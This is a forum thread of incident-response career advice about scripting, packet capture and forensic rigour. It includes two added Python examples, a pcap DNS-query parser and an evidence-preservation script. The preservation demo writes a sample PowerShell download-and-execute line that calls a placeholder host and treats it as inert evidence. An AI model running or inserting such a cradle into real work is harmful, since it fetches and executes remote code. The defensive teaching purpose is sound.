mustninty
Newcomer I

I have 1 year of Incident Response under my belt, what should I start concentrating on?

So I have one year under my belt and I don't feel like I'm drinking from a fire hose any more, just a regular hose (on full blast). I have gotten to the point where I want to move from just learning basics and start to focus on things, maybe one certain thing that an incident handler should know; I'm just not sure where to start. My day-to-day mostly has to do with network analysis, which has been great for getting my network skill level up, and very little endpoint work. I don't know any scripting but have become good at finding PowerShell scripts and tailoring them for my environment. I know this is a loaded question and a lot of people will say it's too hard of a question to answer, but any input to help me focus my time would be appreciated, thanks.

9 Replies
Brewdawg
Contributor I

Not sure what your current skills are, but from my time in IR here are the things I would recommend, a mix of hard and soft skills:


1. Work on learning PowerShell or Perl scripting to make creating automation tools easier

2. Get familiar with Wireshark and packet captures, if not already

3. Find good intel feeds and work on getting the company to take a more proactive rather than reactive stance

4. Foster relationships with other teams so that when that major event happens you have contacts to immediately pull together

5. For any tools that you don't manage but have access to, work with the admins to learn as much as you can about the tool and the information you can get from it. I had a great ArcSight admin at my last job who taught me a lot of the basics of the tool, and the more I used it the better I was able to get the information I needed. Eventually I got elevated permissions to the tool that allowed me to do even more.


Find an area of IR that you really like, or that sounds interesting, start studying up on it, and start networking with others in that area of IR. Things like pen testing, forensics, etc.


Hope this helps a little, and good luck in your IR journey.
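
Items 1 and 2 of the list above (scripting for automation, and getting comfortable with packet captures) go together well in practice. The following is an added example, not code from the thread or from anyone in it: a standard-library Python script that walks a pcap file and pulls out every DNS query name, the kind of first automation a responder who lives in Wireshark tends to write. The capture bytes are constructed inline by `build_sample_pcap()` so it runs offline; the IPs, query names and function names are all made up for the example, and only little-endian Ethernet pcap (not pcapng) is handled.

```python
"""Extract DNS query names from a pcap using only the standard library.

Added example for the thread above, not code from the original post.
The capture is constructed in build_sample_pcap(); nothing here is real traffic.
"""
import struct

PCAP_MAGIC_LE = 0xA1B2C3D4   # value read with "<I" from a little-endian pcap
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_UDP = 17
DNS_PORT = 53


def _dns_name(payload: bytes, offset: int) -> str:
    """Decode an uncompressed DNS name: length-prefixed labels ending in a zero byte."""
    labels = []
    while True:
        length = payload[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointer; a query's QNAME should not use one
            raise ValueError("compressed label in query name")
        labels.append(payload[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels)


def dns_queries(pcap: bytes) -> list:
    """Return [(src_ip, qname)] for every DNS *query* (QR bit clear) in the capture."""
    magic, = struct.unpack_from("<I", pcap, 0)
    if magic != PCAP_MAGIC_LE:
        raise ValueError("only little-endian microsecond pcap is handled here")
    linktype, = struct.unpack_from("<I", pcap, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type is handled here")
    results = []
    pos = 24  # global header is 24 bytes; each record has a 16-byte header
    while pos + 16 <= len(pcap):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack_from("<IIII", pcap, pos)
        pos += 16
        frame = pcap[pos:pos + incl_len]
        pos += incl_len
        if len(frame) < 14 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4          # header length in bytes (options included)
        if ip[9] != IPPROTO_UDP:          # protocol byte: skip TCP, ICMP, ...
            continue
        src_ip = ".".join(str(b) for b in ip[12:16])
        udp = ip[ihl:]
        sport, dport, _ulen, _csum = struct.unpack_from("!HHHH", udp, 0)
        if DNS_PORT not in (sport, dport):
            continue
        dns = udp[8:]
        flags, qdcount = struct.unpack_from("!HH", dns, 2)
        if flags & 0x8000 or qdcount == 0:  # QR=1 means response: skip it
            continue
        results.append((src_ip, _dns_name(dns, 12)))  # QNAME starts after the 12-byte header
    return results


def _frame(src_ip: str, qname: str, response: bool = False, proto: int = IPPROTO_UDP) -> bytes:
    """Build one Ethernet/IPv4/UDP/DNS frame (checksums left zero: this is test input)."""
    labels = b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in qname.split(".")) + b"\x00"
    flags = 0x8180 if response else 0x0100
    dns = struct.pack("!HHHHHH", 0x1234, flags, 1, 0, 0, 0) + labels + struct.pack("!HH", 1, 1)
    sport, dport = (DNS_PORT, 51000) if response else (51000, DNS_PORT)
    udp = struct.pack("!HHHH", sport, dport, 8 + len(dns), 0) + dns
    src = bytes(int(o) for o in src_ip.split("."))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, proto, 0,
                     src, bytes([10, 0, 0, 53])) + udp
    return b"\x02" * 6 + b"\x04" * 6 + struct.pack("!H", ETHERTYPE_IPV4) + ip


def build_sample_pcap() -> bytes:
    """Constructed capture (not real traffic): two queries, one response, one non-UDP frame."""
    frames = [
        _frame("10.0.0.5", "example.com"),
        _frame("10.0.0.5", "example.com", response=True),          # QR bit set: skipped
        _frame("10.0.0.7", "a1b2c3d4e5f6a7b8c9d0.exfil.example"),  # the kind of name worth a look
        _frame("10.0.0.9", "ignored.example", proto=6),            # proto 6 = TCP: skipped
    ]
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    for src, name in dns_queries(build_sample_pcap()):
        print(src, name)
```

Point it at a real capture with `dns_queries(open("trace.pcap", "rb").read())` and the list is ready for the next step: sorting by label length, counting queries per host, or diffing against a feed of known-bad domains, which is where the "intel feeds" item in the list comes in.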

mustninty
Newcomer I

I have been trying to stay in Wireshark most days, if for no other reason than to see what traffic is supposed to look like and get comfortable with it. I have touched on forensics a little bit and that did seem to be the most interesting so far. Your reply did help, thanks for taking the time, I know it's a big question.

CISOScott
Community Champion

Forensics looks glamorous on TV, not so much in real life. You HAVE to have keen attention to detail; be able to perform the same steps over and over in a repeatable, predictable fashion; and know how to document what you find without putting your opinion in it, unless you clearly state "It is the investigator's opinion that such and such happened...."


It can be a fun position, just know the best people in it really love details and being able to provide facts.

mustninty
Newcomer I

OK so maybe not Forensics, lol. It did look interesting but I don't know how well I would do in a very detail oriented position. Not that I'm sloppy but it is not my best quality.

CISOScott
Community Champion

Don't get me wrong, I think IR people should definitely learn forensics at a basic level so they can be careful enough when performing the initial response not to accidentally destroy or alter evidence.


You should try different aspects of information security to find out what you like. I like it all and that is why a CISO position suits me well. I would also learn some system administration stuff too. Knowing how something is supposed to work can help you determine why it didn't work as expected or was violated by someone who got it to perform in an unexpected manner.


The key is to find what YOU like to do.
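
The two points made in this reply and the one before it, don't alter evidence during initial response and record facts rather than opinions, are habits that can be built into even a small collection script. The following is an added example, not code from the thread: it fingerprints a file (stat, then SHA-256) before anything else touches it, copies it into an evidence directory, proves the copy matches, and appends a custody record that contains only observed values. `run_demo()` then shows the failure mode CISOScott warns about by deliberately opening the copy for writing, which `verify()` catches. The "suspicious.ps1" file, the analyst name and the directory layout are all constructed for the example.

```python
"""Hash-before-you-touch evidence collection with a factual custody record.

Added example for the thread above, not code from the original post.
The "evidence" is a constructed temporary file, not real case data.
"""
import hashlib
import json
import os
import shutil
import tempfile
import time

CHUNK = 1 << 16


def fingerprint(path: str) -> dict:
    """Stat first, then hash. Stat before open so the recorded atime is the
    pre-collection value rather than the one our own read may update."""
    st = os.stat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as fh:  # read-only; never open evidence for writing
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            digest.update(chunk)
    return {"sha256": digest.hexdigest(), "size": st.st_size,
            "mtime": st.st_mtime, "atime": st.st_atime}


def preserve(src: str, evidence_dir: str, collector: str, custody_log: list) -> dict:
    """Copy src into evidence_dir, prove the copy matches, append a factual record."""
    before = fingerprint(src)
    dst = os.path.join(evidence_dir, before["sha256"][:16] + "_" + os.path.basename(src))
    shutil.copy2(src, dst)  # copy2 carries mtime/atime over to the copy
    after = fingerprint(dst)
    record = {  # observed values only: no "assessment" or "likely malicious" field
        "collected_at": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "collector": collector,
        "source": src,
        "copy": dst,
        "sha256": before["sha256"],
        "size": before["size"],
        "source_mtime": before["mtime"],
        "source_atime": before["atime"],
        "copy_matches_source": after["sha256"] == before["sha256"],
    }
    custody_log.append(record)
    if not record["copy_matches_source"]:
        raise RuntimeError("copy of %s does not match the source hash" % src)
    return record


def verify(record: dict) -> bool:
    """Re-hash the preserved copy and compare with the hash recorded at collection."""
    return fingerprint(record["copy"])["sha256"] == record["sha256"]


def run_demo() -> dict:
    """Constructed scenario: preserve a file, confirm it verifies, then show that a
    careless write to the copy is caught and that the source was never altered."""
    work = tempfile.mkdtemp(prefix="ir-demo-")
    src = os.path.join(work, "suspicious.ps1")
    with open(src, "wb") as fh:  # constructed sample, not a real artifact
        fh.write(b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\n")
    evidence_dir = os.path.join(work, "evidence")
    os.mkdir(evidence_dir)
    log = []
    record = preserve(src, evidence_dir, "analyst01", log)
    verified_after_copy = verify(record)
    with open(record["copy"], "ab") as fh:  # the mistake: "just adding a note" to the evidence
        fh.write(b"# looked at this\n")
    tamper_detected = not verify(record)
    source_untouched = fingerprint(src)["sha256"] == record["sha256"]
    log_json = json.dumps(log, indent=2)
    shutil.rmtree(work)
    return {"verified_after_copy": verified_after_copy,
            "tamper_detected": tamper_detected,
            "source_untouched": source_untouched,
            "records": len(log),
            "log_json": log_json}


if __name__ == "__main__":
    outcome = run_demo()
    print(outcome["log_json"])
    print({k: v for k, v in outcome.items() if k != "log_json"})
```

The record is deliberately boring: hashes, sizes, timestamps, who and when. Anything that reads as a conclusion ("attacker dropped this") belongs in the analysis write-up, clearly marked as opinion, not in the custody log.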

mustninty
Newcomer I

Great advice, thank you.

rslade
Influencer II

> CISOScott (Advocate I) posted a new reply in Career on 11-14-2018 01:27 PM in the (ISC)² Community:

> Forensics looks glamorous on TV, not so much in real life.

Amen.

> Unless you clearly state "That it is of the investigators opinion that such and such happened....."

And not always then. If it ends up in court (and, in forensics, you always have to assume that it *might* end up in court) you can't give an opinion unless you are an expert witness. The rules vary: in the US the judge gets to decide who is an expert (but you do have to prove your background and experience). In the UK, for example, you can't be an expert witness if you are a cop, because there is an automatic assumption of bias. (In the US, they don't care about bias in experts.)

Oh, and these rules are only for Common Law jurisdictions; for Civil Law other rules apply ...

====================== (quote inserted randomly by Pegasus Mailer)
rslade@vcn.bc.ca slade@victoria.tc.ca rslade@computercrime.org
A teacher is one who makes himself progressively unnecessary.
- Thomas Carruthers
victoria.tc.ca/techrev/rms.htm http://twitter.com/rslade
http://blogs.securiteam.com/index.php/archives/author/p1/
https://is.gd/RotlWB

............

Other posts: https://community.isc2.org/t5/forums/recentpostspage/user-id/1324864413

This message may or may not be governed by the terms of
http://www.noticebored.com/html/cisspforumfaq.html#Friday or
https://blogs.securiteam.com/index.php/archives/1468
mustninty
Newcomer I

Great info and yes I plan to try and touch on everything out there in the cyber security field so that I'm not completely lost on any one thing.

rslade
Influencer II

> mustninty (Newcomer I) posted a new reply in Career on 11-19-2018 01:26 PM in

> Great info and yes I plan to try and touch on everything out there in the cyber security field so that I'm not completely lost on any one thing.

Basically, that's what the CISSP is all about ...
